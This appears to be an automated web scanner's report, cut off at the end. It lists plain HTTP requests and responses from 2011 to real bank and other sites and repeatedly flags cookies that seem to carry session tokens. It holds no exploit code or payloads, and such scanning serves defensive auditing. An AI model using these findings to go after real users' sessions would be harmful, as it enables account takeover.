GET /smallbusiness/cards/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:57 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=FbpnNJWNTkZPPVyCtR9T3vhQFrHc45TyPPQ2LmGLKGmK8b3yr5XQ!1025162061; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDkzMDR1bFp4Rmh3TlZLcVFyL2JUZVJYcE9nPT0=; expires=Tuesday, 21-Feb-2079 01:26:04 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:57 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 68542
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Browse business credit cards online and apply for C ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smallbusiness/payroll/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:58 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=1LyBNJWTQDvpxXPth7p4yrMGr417XqLXvtLTJNWJDPZwntqtXcTX!-1660665105; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxMzk3OTRxNlVsM2hObzczWFlhQ2ZPV01ZajF3PT0=; expires=Tuesday, 21-Feb-2079 01:26:05 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:58 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 49209
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Business Payroll (SM) - Capital One"/><meta name="k ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MilitaryLendingProgram HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Thu, 03 Feb 2011 01:06:32 GMT Content-type: text/html CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/ccpmweb/chf/document/militarylendingrogram.html Set-Cookie: DCTMSESSION=pWqKNJ1Yv9NlgJ9kghvXKyZLpQVVXTgYyKD5x51HXqvvslJM3G4x!-661114096; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.chase.com/ccpmweb/chf/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ccp/index.jsp HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:36 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/ Set-Cookie: DCTMSESSION=JWTFNJXGmZr1X2nwQZHwnnLjtkzTGpQJ5DHvfJ94f6GFQqG4Qgyv!1262409899; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFF ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /chf/mortgage/om_chasecom_redirect HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 200 OK Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:35 GMT Content-length: 959 Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Set-Cookie: DCTMSESSION=ShdXNJXDQb0ZFHj1qGKczSFvgTsznLZk7Y4h2czW2Hy7tvLD7KtZ!1262409899; path=/ Connection: close
<html LANG="EN" > <head> <META NAME="robots" CONTENT="index,follow"/> <title >Chase</title> </head> <body><script language="JavaScript"> var s_pageName="Homeownership Center - Obama March 4th - chase ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /framework/skeletons/psmgenskel HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:36 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/cm/shared/crb/page/notfound.html Set-Cookie: DCTMSESSION=TGFhNJXG71xk8S9N20Cn9bvPGH9yrm34fvpzv4HJ4vS1Qd9YSb6M!1262409899; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /framework/skins/psmgenskin HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:37 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/cm/shared/crb/page/notfound.html Set-Cookie: DCTMSESSION=m6CMNJXFZC8PjQQGMf6sxvPhwgmTfjK0RYFv4QFJyyLQsBjXGn1m!2074473016; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /framework/skins/psmgenskin/images HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:37 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/cm/shared/crb/page/notfound.html Set-Cookie: DCTMSESSION=6g6NNJXFxLM7k3X2S2lR1bkgB1YqhbvphnpHhSMxkgVP6SXmGTFQ!1262409899; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.jsp HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:34 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: https://www.chase.com/ Set-Cookie: DCTMSESSION=jfkfNJXCyH5XHZVYYRdMBh3DlcZvv0J0RGw0MtqzPlxX9TQR6Xvp!2074473016; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFF ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online/logon/on_successful_logon.jsp HTTP/1.1 Host: www.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;
Response
HTTP/1.1 301 Moved Permanently Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:16:34 GMT Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Location: http://www.chase.com/cm/cs?urlname=shared/crb/page/notfound.jsp Set-Cookie: DCTMSESSION=NKdvNJXCtfpNBvzYPBCnfP7wBLN2Mt3mCwB2QVmpcRW091j5sTGT!-1658401948; path=/ Connection: close
<!--Generated by WebLogic Workshop-->
<html><head><title>302 Moved Temporarily</title></head> <bo ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /domain/index.jsp HTTP/1.1 Host: www.citi.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /domain/scripts/config.jsp HTTP/1.1 Host: www.citi.com Proxy-Connection: keep-alive Referer: http://www.citi.com/domain/home.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mobiledetect=false; JSESSIONID=R5X5NJTZ3ppnyZvlWDvGgDyfTxKqVG2Q4SL8xGJkwfC4xZlJ8Sds!-455328445
Response
HTTP/1.1 200 OK Server: "" Date: Wed, 02 Feb 2011 21:59:54 GMT Content-length: 167 Content-type: text/javascript; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; path=/ Connection: close
var CITI_ENV = 'http://www.citi.com'; var JFPDOMAIN = 'https://online.citibank.com'; var PGI = 'citi.bridgetrack.com'; var BVE = '.'; var HBX = 'DM550608DPBR';
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search/advanced.jsp HTTP/1.1 Host: www.citi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;
Response
HTTP/1.1 200 OK Server: "" Date: Wed, 02 Feb 2011 22:16:52 GMT Content-length: 9862 Content-type: text/html; charset=iso-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: JSESSIONID=J2p2NJXJWGcFrv05jcRLtCqdJlQJnBG9XFdLpDVyyTrCS2RvLqzq!187799042; path=/ Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search/results.jsp HTTP/1.1 Host: www.citi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;
Response
HTTP/1.1 302 Moved Temporarily Server: "" Date: Wed, 02 Feb 2011 22:16:52 GMT Content-type: text/html; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Location: http://www.citi.com/search/search.jsp Set-Cookie: JSESSIONID=lFNyNJXJGtNdT2dBy6yQNSS22B51L6JfWN1bPnvznz3J1M5fnHhp!187799042; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://www.citi.com/search/search. ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us/cards/index.jsp HTTP/1.1 Host: www.citibank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: "" Date: Wed, 02 Feb 2011 22:16:55 GMT Content-length: 854 Content-type: text/html; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: JSESSIONID=GlQxNJXX9hjkzSqQqQWNphxfGRm78JMp2dwJ21YKmvTyYW6xpK69!-455328445; path=/ Connection: close
<html> <head> <title>Citi Credit Cards | Choose from a variety of Rewards Credit Cards, Student Credit Cards, Small Business Credit Cards, and Value Credit Cards.</title> <meta name="keywords" co ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/stepthree HTTP/1.1 Host: www.cualn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:00:30 GMT Server: Apache X-Powered-By: PHP/5.2.14 Set-Cookie: SESS5dcca8fe1cebbc00afd6b71bc7e17676=0505b6f8eb0dfb02deb4a1644b2c68ec; expires=Sat, 26-Feb-2011 04:33:50 GMT; path=/; domain=.cualn.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 01:00:30 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 11430
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.directstartv.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /view/?5489 HTTP/1.1 Host: www.emagazine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /LaunchPad/dflt/Login.pncadv HTTP/1.1 Host: www.esp01.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:18:09 GMT Server: Apache Set-Cookie: JSESSIONID=0001MlXU1BY2vtyfBtHvrPCXhsj:pr-rdc678-61015gis-a/espts-ethasp8; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 7069
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <HTML xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"> <HEAD> <TI ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.fdic.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:18:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 43093 Content-Type: text/html Set-Cookie: ASPSESSIONIDCSBRDRBD=IBKPGPIAFCHAEGEBGLLPBOMO; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.firstnational.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Object moved Date: Wed, 02 Feb 2011 21:59:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: http://www.firstnational.com/001/html/en/personal/personal.html Content-Length: 184 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://www.firstnational.com/001/html/en/personal/personal.html">here</a>.</body>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /config/html/en/searchresults.asp HTTP/1.1 Host: www.firstnational.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:41:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 25669 Content-Type: text/html Set-Cookie: ASPSESSIONIDQASASQCD=FHHAGHGAJJNGHOEBODOGIMJG; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir=" ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /config/html/en/setcookie.asp?default=personal HTTP/1.1 Host: www.firstnational.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;
Response
HTTP/1.1 302 Object moved Connection: close Date: Wed, 02 Feb 2011 22:19:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /001/html/en/personal/personal.html Content-Length: 156 Content-Type: text/html Set-Cookie: fnbDefault=personal; expires=Thu, 02-Feb-2012 06:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDQASASQCD=OBDAGHGAEBGAPCBHABGIEIIP; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/001/html/en/personal/personal.html">here</a>.</body>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.firstnationalinvestmentsandplanning.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Connection: close Date: Wed, 02 Feb 2011 22:19:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /home/default.asp Content-Length: 138 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSDBQTCD=EDPHJCGACBBDPAOLPJNIMGPO; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/home/default.asp">here</a>.</body>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fis/worldnews/worldnews.asp HTTP/1.1 Host: www.fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 00:58:54 GMT Connection: close Content-Length: 83551 Content-Type: text/html Set-Cookie: ASPSESSIONIDCASTCAST=PMHBFPGBGMDOPCOGKGMJMGLM; path=/ Cache-control: private
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1800"> <title>FIS - Worldnews - Icelandic Group still up for grabs</title ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tag/ipboard HTTP/1.1 Host: www.forum-software.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren HTTP/1.1 Host: www.grist.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 01:15:49 GMT Server: Apache X-Powered-By: PHP/5.2.4-2ubuntu5.12 Set-Cookie: PHPSESSID=394bce86b159c0f351253ee87caa8df9; path=/ Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: exp_last_visit=981364550; expires=Fri, 03-Feb-2012 01:15:50 GMT; path=/; domain=.grist.org Set-Cookie: exp_last_activity=1296724550; expires=Fri, 03-Feb-2012 01:15:50 GMT; path=/; domain=.grist.org Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A82%3A%22%2Farticle%2Ffood-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren%2F%22%3B%7D; path=/; domain=.grist.org Last-Modified: Thu, 03 Feb 2011 01:15:50 GMT Content-Type: text/html X-Cache: MISS from grist-squid02.prod.grist.org X-Cache-Lookup: MISS from grist-squid02.prod.grist.org:80 Via: 1.0 grist-squid02.prod.grist.org (squid/3.1.8) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceb ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /NASApp/NetAccess/AboutDisplay HTTP/1.1 Host: www.ibsnetaccess.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:19:24 GMT Server: IBM_HTTP_Server Pragma: no-cache Expires: Tues, 01 Jan 1980 00:00:00 GMT Set-Cookie: JSESSIONID=0000OPVUXvnLQWTsNmxnOsJOjeV:15bs25f24; Path=/; Secure Cache-Control: no-store, no-cache=set-cookie Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 13482
<html lang="en">
<head> <title>FIA Card Services Net Access: About Net Access</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /NASApp/NetAccess/ContactsDisplay HTTP/1.1 Host: www.ibsnetaccess.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:19:25 GMT Server: IBM_HTTP_Server Pragma: no-cache Expires: Tues, 01 Jan 1980 00:00:00 GMT Set-Cookie: JSESSIONID=0000SvWETqda1i7_tKHrr3Sv1oz:15bs25f24; Path=/; Secure Cache-Control: no-store, no-cache=set-cookie Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 50683
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
